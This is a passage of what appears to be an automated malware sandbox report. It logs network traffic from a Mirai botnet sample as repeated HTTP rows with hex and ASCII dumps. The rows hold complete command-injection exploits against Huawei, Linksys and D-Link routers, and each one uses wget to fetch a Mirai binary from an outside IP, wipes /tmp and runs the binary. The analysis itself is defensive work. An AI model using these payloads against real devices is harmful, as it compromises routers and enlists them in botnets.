6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 